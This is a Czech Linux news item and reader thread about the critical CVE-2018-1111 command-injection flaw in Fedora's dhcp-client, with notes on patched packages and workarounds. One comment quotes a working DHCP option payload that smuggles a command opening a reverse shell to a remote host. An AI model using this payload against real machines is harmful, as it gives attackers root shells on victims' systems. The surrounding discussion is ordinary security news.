Portál AbcLinuxu, 15. července 2025 03:28


Kritická bezpečnostní zranitelnost CVE-2018-1111 v balíčku dhcp-client (nejen) ve Fedoře

MojeFedora.cz upozorňuje (en) na kritickou bezpečnostní zranitelnost CVE-2018-1111 v balíčku dhcp-client (nejen) ve Fedoře. Pomocí dhcp-clienta, který běží v rámci NetworkManageru, může útočník v systému spouštět libovolné příkazy s právy roota. Bezpečnostní chyba je opravena v nových verzích balíčku dhcp-client.

15.5.2018 23:33 | Ladislav Hagara | Bezpečnostní upozornění


Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

Komentáře

Nástroje: Začni sledovat (0) ?Zašle upozornění na váš email při vložení nového komentáře. , Tisk

Vložit další komentář

16.5.2018 06:14 finn | skóre: 43 | blog: finnlandia | 49° 44´/13° 22´
Rozbalit Rozbalit vše Re: Kritická bezpečnostní zranitelnost CVE-2018-1111 v balíčku dhpc-client (nejen) ve Fedoře
Odpovědět | Sbalit | Link | Blokovat | Admin 
s/dhpc/dhcp/g
Užívej dne – možná je tvůj poslední.
16.5.2018 07:53 Ladislav Hagara | skóre: 105 | blog: Ride the Raven
Rozbalit Rozbalit vše Re: Kritická bezpečnostní zranitelnost CVE-2018-1111 v balíčku dhcp-client (nejen) ve Fedoře
Dík, opraveno. Zkopírováno i s chybou z originálu:
"Dnes byla objevena a oznámena kritická bezpečnostní zranitelnost v dhpc-client".
16.5.2018 10:47 RB
Rozbalit Rozbalit vše Re: Kritická bezpečnostní zranitelnost CVE-2018-1111 v balíčku dhcp-client (nejen) ve Fedoře
Dívám se, že v originále už to je taky opravené + tam přibyla poznámka, že problém lze vyřešit také odinstalací dhcp-client. Pak NM fallbackne na systemd-networkd, kterého se tento problém netýká.
16.5.2018 12:18 Andrej | skóre: 9
Rozbalit Rozbalit vše Re: Kritická bezpečnostní zranitelnost CVE-2018-1111 v balíčku dhcp-client (nejen) ve Fedoře
Odpovědět | Sbalit | Link | Blokovat | Admin
dhcp-client a zavisle kniznice su uz fixnute v stable vetve, takze updatujte!
Any sufficiently advanced magic is indistinguishable from technology. --Larry Niven
Jendа avatar 16.5.2018 23:12 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: Kritická bezpečnostní zranitelnost CVE-2018-1111 v balíčku dhcp-client (nejen) ve Fedoře
Odpovědět | Sbalit | Link | Blokovat | Admin
TL;DR dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #"
17.5.2018 07:53 Ladislav Hagara | skóre: 105 | blog: Ride the Raven
Rozbalit Rozbalit vše Re: Kritická bezpečnostní zranitelnost CVE-2018-1111 v balíčku dhcp-client (nejen) ve Fedoře
Odpovědět | Sbalit | Link | Blokovat | Admin
DynoRoot!!!1111 - CVE-2018-1111
17.5.2018 16:26 NN
Rozbalit Rozbalit vše Re: Kritická bezpečnostní zranitelnost CVE-2018-1111 v balíčku dhcp-client (nejen) ve Fedoře
Odpovědět | Sbalit | Link | Blokovat | Admin
Chtel bych vedet kdo tam dal ten eval..
23.5.2018 07:11 petr_p | skóre: 59 | blog: pb
Rozbalit Rozbalit vše Re: Kritická bezpečnostní zranitelnost CVE-2018-1111 v balíčku dhcp-client (nejen) ve Fedoře
Stačí hledat.
18.5.2018 20:30 biolog
Rozbalit Rozbalit vše Re: Kritická bezpečnostní zranitelnost CVE-2018-1111 v balíčku dhcp-client (nejen) ve Fedoře
Odpovědět | Sbalit | Link | Blokovat | Admin
Na to se dá říct jen jediná věc: chá chá.

Založit nové vláknoNahoru


ISSN 1214-1267, (c) 1999-2007 Stickfish s.r.o.